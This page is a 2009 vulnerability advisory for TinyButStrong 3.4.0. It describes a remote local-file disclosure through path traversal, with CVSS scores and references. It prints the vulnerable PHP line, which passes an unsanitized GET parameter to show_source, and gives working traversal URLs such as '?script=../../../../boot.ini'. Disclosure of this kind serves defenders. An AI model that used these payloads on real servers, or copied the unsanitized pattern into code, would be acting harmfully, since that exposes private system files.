TinyButStrong 3.4.0 (script) Local File Disclosure Vulnerability

2009.05.18
Credit: ahmadbady
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: None
Availability impact: None

( ' )-. ,~'`-. ,~' ` ' ) ) _( _) ) ( ( .--.===.--. ( ` ' ) `.%%. .#`. `-'`~~=~' /%%/ \##\ |%%/ local \##| |%%| |##|.,-. \%%| file |##/ )_ \%\ /#/ ( `' ) \%\ include /#/( , -'`-. ,~-. `%\ /#'( ( ') ) ( ) )_ `\__|__/' `~-~=--~~=' ( ` ') ) [-=-=-] (_(_.~~~' \|_|/ [***] \|||/ (o o) -=-=-=-==-=-=-=-=-=-=-=+-oooO--(_)-------+-=-=-=-=-=-=- | | | | script:TinyButStrong version 3.4.0 ------------------------------------------------- Author: ahmadbady email: kivi_hacker666@yahoo.com my site:Coming Soon =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-====-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= download from:http://www.tinybutstrong.com/download/download.php?file=tbs_us.zip&sid=2 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=--=-=--= vul:/examples/tbs_us_examples_0view.php <?php if (!isset($_GET)) $_GET=&$HTTP_GET_VARS ; show_source('tbs_us_examples_'.$_GET['script']) ; exit ; ?> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=- xpl: path/examples/tbs_us_examples_0view.php?script=../../../../boot.ini path/examples/tbs_us_examples_0view.php?script=[local_file] -=-=-=-=-=-=-=-=-=-=-=-+------------Ooo--+-=-=-=-=-=-=-=-=-=-=-=-=- |__|__| || || OoO OoO

References:

http://xforce.iss.net/xforce/xfdb/50506
http://www.vupen.com/english/advisories/2009/1304
http://www.milw0rm.com/exploits/8667


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top